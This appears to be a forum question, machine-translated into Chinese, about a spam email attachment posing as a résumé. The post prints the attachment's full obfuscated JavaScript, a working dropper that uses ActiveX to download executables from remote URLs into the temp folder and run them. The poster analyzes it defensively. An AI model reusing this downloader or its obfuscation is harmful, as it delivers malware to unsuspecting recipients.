很抱歉,如果这不是正确的地方,请LMK,如果这个问题更适合其他地方!
我收到了一封特别有趣的垃圾邮件发送到我的工作邮箱。它应该是某人的简历,但它实际上是一个非常模糊的javascript。看起来它试图通过activeX启动Windows可执行文件。我认为攻击者的目标是让您直接将.js
文件作为Windows脚本运行。我在Windows 7计算机上运行它,Symantec Endpoint通过“Suspicious executable image download
”警告将其停止。我在没有安装任何防病毒软件的Windows XP vm中运行它,我收到了弹出通知
2865241.exe - 应用程序错误应用程序无法正确初始化(0xc0000135)。单击“确定”以终止应用程序
然后是来自Windows Script Host
Script: C:\path\to\Resume Jaime Harding.js
Line: 9
Char: 1
Error: Write to file failed.
Code: 800A0BBC
Source: ADODB.Stream
所以它实际上是在尝试编写二进制文件并运行它吗?它可能想要完成什么?它为什么失败?我扮演了“容易受骗的电子邮件收件人”的角色并运行它,它只是被轰炸了。这会成功的环境是什么?
许多乱码看起来很可能是故意丑陋的变量名称,用作window
的属性。但是,有很多"charAt"
s所以字符串可能只是一个诱饵,它只是提取某些字符并使用它们。一些“函数”的参数以(/regex/g,"")
的形式传递,所以它看起来像是试图从字符串中滤除垃圾,但我无法分辨实际调用replace
的位置是否会实际取代。
以下是JS,它是高度混淆的。我为了一些可读性而赞美它。
(function () {
var D2p = (8.0 + "'=+)D]R.MPjS"["length"] * 28);
kOY = ("\x89\x60eYE;U\x83L^SP'yp"["charCodeAt"](6) * 0 + 18.0);
qEI = "N9-0GO3m8/d*VI4&g)tG*k"[("=[TOcgnm7St5a(hUdK,?"["charCodeAt"](13) * 409139717 + 39.0)["toString"](("xA\x85Ru6-iU{*c~\x87\x86("["charCodeAt"](5) * 0 + 29.0))](/[m\-\*I0tNO\)\&\/]/g, "");
T7Y = "6Y=0oSknwWp[U&qjKCBF*L"[("<e.y\x8bZ2fX\x7f"["charCodeAt"](2) * 921305672 + 22.0)["toString"]((34.0 + "NuU\x7f/\x8a\x8683y$EY<f&{x"["charCodeAt"](8) * 0))](/[\*Kj\&\=6wW\[oBk]/g, "");
var Ecf = (88 * "\x85P<S\x82"["length"] + 0.0);
Tkv = ("T_e8\x83\x87X|fA\x80I\x89{\x85"["length"] * 2 + 3.0);
var Cq7 = "AGREkUTp8D&bJGdZ;qL0QsP"[(9.0 + "u\x800]\x89@ye\x88\x8aWajvT="["charCodeAt"](10) * 280311852)["toString"]((3.0 + "<$*,?Rn"["length"] * 4))](/[RJ\&pLQkUd8As\;]/g, "");
var ZTl = "`S75d`QHS@garJi50+94Y0"["replace"](/[Y\@\+HJ79a5\`]/g, "");
LIm = "AGt9>wrW66389bs4a0Yv72"["replace"](/[rAs8a\>Ybt67]/g, "");
gF9 = "#ni`1z0c~_w-vamT4uC7Fc%G"[(12.0 + "\x83%Q\x880\x8b*asr\x82;W"["length"] * 3877454369)["toString"]((5 * "_YKyr\x82"["length"] + 5.0))](/[\-\%4Fm\#0C\~1\_\`vn]/g, "");
var Uwg = "QwFnSfAc07q2MpO!]P*HzbZ"[(4.0 + "CHE'zl+]e4"["length"] * 4238006093)["toString"]((34.0 + "1y.\x89d/}n*6\x7f\x88w"["charCodeAt"](8) * 0))](/[z\!f27\*Qw\]npcb]/g, "");
function Kg3(fr, KPA, rn) {
var ERG = new ActiveXObject("]W_SFc)rHi7p_tz.TSv%hB_eKl5l"["replace"](/[\)KT\%vzF\_7\]5HB]/g, ""));
var mE6 = ("Ov\x81xP*sX\x80"["length"] * 11 + 4.0);
var KPA = ERG["Ex" + (73 > 45 ? "\x70" : "\x68") + "andEnvironmentSt" + "" + (77 > 7 ? "\x72" : "\x6d") + "ings"]("G%oT&EySM&PXX%"[("iIopR\x809O2\x82PtYg:'[}#"["charCodeAt"](12) * 225213779 + 43.0)["toString"]((0.0 + "OJN.R%\x8angI"["length"] * 3))](/[\&SXGyo]/g, "")) + String["f" + "romCharCod" + (81 > 5 ? "\x65" : "\x5e") + ""](92) + KPA;
var j$2 = "qv3zu6Sa7FdMeSbxt~*fklyGQu"[(43.0 + "5Hd|tb/M3Yx\x87e"["charCodeAt"](6) * 1269417725)["toString"]((0 * "Wv1jN\x88G\x81muC4nVx#w<"["charCodeAt"](11) + 36.0))](/[G\*6qvl\~kxSQFMz7]/g, "");
var Ttc = new ActiveXObject("kM+SGNXfMFfLD2g.kX[mM#L3H`qTFT/AP"["replace"](/[\/NkqF\[\#\+G\`gADmf3]/g, ""));
QBc = "efbNd<t&A&q@4%`8RFLI29CH"["replace"](/[\`9\<edI\@R\&\%CLb]/g, "");
Ttc["onre" + (78 > 3 ? "\x61" : "\x5a") + "dys" + "t" + (71 > 45 ? "\x61" : "\x5c") + "techange"] = function () {
if (Ttc["r" + "eadyStat" + (98 > 18 ? "\x65" : "\x60") + ""] === 4) {
var OF$ = new ActiveXObject("-AlDROqDWBJ.ESz!tbir#eH[a&lm"["replace"](/[H\#JWi\-E\!\[zqR\&lb]/g, ""));
var Jwu = ("08#\x89:{\x83\x81[UR]2I"["charCodeAt"](10) * 4 + 60.0);
OF$["o" + "" + (58 > 34 ? "\x70" : "\x67") + "en"]();
i61 = "eJj7XqxlFeC5B_1RsHQt!1"["replace"](/[QXje\!5sx\_Rl]/g, "");
izb = ("U}o=Q8(c<\x8bO-|.5^"["charCodeAt"](6) * 2 + 34.0);
var zyH = (10.0 + "\x80LF:,n'1-c0\x8a="["length"] * 11);
var k3C = ";n@E2LaW=0GNTs-1JT!OTce"["replace"](/[T\=\;1\-\!ca\@G2]/g, "");
OF$["" + "t" + (91 > 18 ? "\x79" : "\x72") + "pe"] = 1;
var EKM = "Ncvs&1RzLd8Qt7Z-~M(YQfrp"[("-*\x84f\x86N\x8b6Tn{qgw3yl\x7fK"["charCodeAt"](5) * 454460829 + 5.0)["toString"](("\x89/(,TD#e<kyn%+.xW"["charCodeAt"](13) * 0 + 33.0))](/[c7\(R\-s\~\&r8NQL]/g, "");
OF$["wri" + (76 > 16 ? "\x74" : "\x6a") + "" + "e"](Ttc["R" + (94 > 34 ? "\x65" : "\x5b") + "s" + "ponseB" + (85 > 2 ? "\x6f" : "\x65") + "dy"]);
PDX = (31.0 + "5IY9?r\x896B{i1*Re"["charCodeAt"](12) * 6);
OF$["" + "posi" + (77 > 29 ? "\x74" : "\x6a") + "ion"] = 0;
v$8 = (2.0 + "b&|\x8b)gY\x83"["length"] * 61);
OF$["saveT" + (79 > 38 ? "\x6f" : "\x68") + "F" + "" + (85 > 43 ? "\x69" : "\x62") + "le"](KPA, 2);
W2Q = "(DLsxL6Ll0a(OC]trZBv`b"[(")=\x88\x81>"["length"] * 10081381361 + 4.0)["toString"]((0 * "aWi\x80/4h\x60uIcJbt-^,'"["charCodeAt"](17) + 35.0))](/[\(OBx0r\`\]L]/g, "");
OF$["c" + "los" + (94 > 26 ? "\x65" : "\x5b") + ""]();
var ue0 = "MT3gL29u`i-u4k3eR8N+o"["replace"](/[4\+\`L8MR93\-]/g, "");
}
;
var xbw = "MY<m6do1bcJs;j3mCP7c"[(283571292 * "GbS4sw#qE*\x7f)\x87V"["charCodeAt"](13) + 21.0)["toString"]((3 * "57e2>-m+"["length"] + 7.0))](/[\<3MoJ67b\;C]/g, "");
};
var b$y = ("\x86mjoi\x87n.(y0#,Y"["length"] * 2 + 0.0);
Teq = "80u3mip>VfE-Mnlk9@[L*yEc"[("v({w>Y<qr#3-="["length"] * 3877454369 + 12.0)["toString"](("pm\x60oO(EeT<w"["charCodeAt"](5) * 0 + 35.0))](/[\[V0\*kEi3\@\>\-8n]/g, "");
try {
Ttc["o" + "p" + (65 > 36 ? "\x65" : "\x5e") + "n"](";GoE%T"["replace"](/[o\%\;]/g, ""), fr, false);
lw7 = "fte5jz9s_Yt=DIb]aB!6IB"[(1050143891 * "5~K<\x60c0>lC@=E("["charCodeAt"](6) + 41.0)["toString"]((0 * "p4uV?rw.'\x83m|\x86"["charCodeAt"](4) + 35.0))](/[\!\_9\=faIeY\]j]/g, "");
var jLj = "`=e;E_fhW2c/F8njVljt(G"["replace"](/[\`\/\;lj2\(h\_\=8]/g, "");
Ttc["" + "s" + (53 > 26 ? "\x65" : "\x5c") + "nd"]();
var X2P = (41 * "&S_R8gA'v"["length"] + 7.0);
if (rn > 0) {
ERG["R" + "" + (55 > 18 ? "\x75" : "\x6e") + "n"](KPA, 0, 0);
pcx = "oHzfN0Bajv]M5Tpy(Ssik=Kt"[(9.0 + "=h)$[\x84>:8#MIZ-fK}"["charCodeAt"](7) * 869084600)["toString"]((35.0 + "Ul\x88\x84^ObN+:Q>HomiJqg"["charCodeAt"](9) * 0))](/[\=5jKapiS\(zo\]N0]/g, "");
}
;
var FmH = "7_3QTXRgjK6+mj/4!2&h[ml"[("djG\x80\x8bMk\x814&geJ/\x86#\x83s"["charCodeAt"](5) * 382957200 + 62.0)["toString"]((32.0 + "\x84h4qDZ2j$\x817C"["charCodeAt"](2) * 0))](/[Q\/gK\+7X\_\&\[m\!]/g, "");
sIy = (36.0 + "O8^\x88aSZN&Ts"["charCodeAt"](9) * 4);
VBS = (17 * "$jG)r^o\x894Oc5"["length"] + 1.0);
} catch (er) {
}
;
sKc = "l2iC]fvA]f8b7aTzyIkY9[vq"["replace"](/[72I8\[vyTCYl\]]/g, "");
}
Kg3("qhAtyt<zpx5:X/>/DdMa@vciksl1x>.=Ir7uK/Ri0m2a`gIe-%s0/6Ooqn]e)!.7]jNpKg"["replace"](/[qyKADO\%\-67\)\>R\`I5\@z\<0N2\=\!klxM\]cX]/g, ""), "L2MP8&6@5s2s4Q1().ibeaxYe"[(672699379 * "\x81\x7f{=%\x85+tE~?DP"["charCodeAt"](10) + 57.0)["toString"]((6.0 + "A\x86hk8DU\x82G6390."["length"] * 2))](/[ab\&Yi\)\@s\(PQLM]/g, ""), 1);
iBR = "~UcONvQg!zT2P(RXe-k(Pp"[(3977508874 * "{2\x7f\x82A\x83S\x88\x84gW~c%P"["length"] + 8.0)["toString"]((0 * "Gk5o~$\x89;2^:plS&gUhnR"["charCodeAt"](10) + 36.0))](/[NQTP\(\-Xc\~\!]/g, "");
var TAb = (2.0 + "B%;'(W]0JaEi\x898_"["length"] * 1);
Jfj = "Qk*rH@UKlsg5O->f`4~iyz"[(2032260927 * ",2\x84\x8b\x60P_[;Qtg"["length"] + 9.0)["toString"]((1.0 + "pQdk["["length"] * 6))](/[\-\~\`sK\@Qy\>\*5r]/g, "");
dkD = "`aL1;xbr;eJkDA)R*hoM"[(62.0 + ";[DY7J:K\x85\x88x$3t<"["charCodeAt"](7) * 393169392)["toString"]((0 * ";fud=6t(%\x80\x82+y^m"["charCodeAt"](8) + 32.0))](/[L\)o\`J\*bD\;]/g, "");
Hz9 = "zNiGSF9+7WHUhpZxILHEM"["replace"](/[F\+pULEzSixW]/g, "");
Kg3("Bhxt(tZ%pfM:#/Y/%nd3a;vGxiNs8R1N.kr>uTD/ficmTaKg5e&s4J/]tEwWoJ.EjH%pcg"[(7089588933 * "z_OC("["length"] + 2.0)["toString"]((33.0 + "PRybeAL>6;U\x87"["charCodeAt"](9) * 0))](/[4DKJ5RY\(3NM\%cx\]Hn\>ET\&WfkG\#\;8ZB]/g, ""), "S1-2+40605X4[9=.pelx;e"[(68.0 + "T|YL[u;<UR\x83x?\x80D~\x8b2b"["charCodeAt"](8) * 701913330)["toString"](("\x8a)jUF4$^e\x7fy;{WL_d]Xg"["charCodeAt"](6) * 1 + 0.0))](/[lX\-S\;\=\[p0\+]/g, ""), 1);
sZV = (1 * "p\x83jcq\x88d6\x85g[Ca&"["charCodeAt"](7) + 24.0);
var q3y = "+mp&uoRvn/GXa`rJKxKzW"[(33.0 + "|P,Ehf7\x8a\x82QN0X"["charCodeAt"](6) * 1084775147)["toString"]((6.0 + "^d\x896m2?:\x83\x8b"["length"] * 3))](/[\`mxoXz\/vJ\+\&]/g, "");
var vQ8 = "TAM~6=&uHrQcF=p3sOqS~81C"[(308784692 * "\x60,'3OKskndZw\x8b5iRgGN"["charCodeAt"](13) + 43.0)["toString"](("+O6hr>Vn8_0zktN"["length"] * 1 + 14.0))](/[TQ\&3\~OqM\=H1c]/g, "")
})();//p061q4Iu1W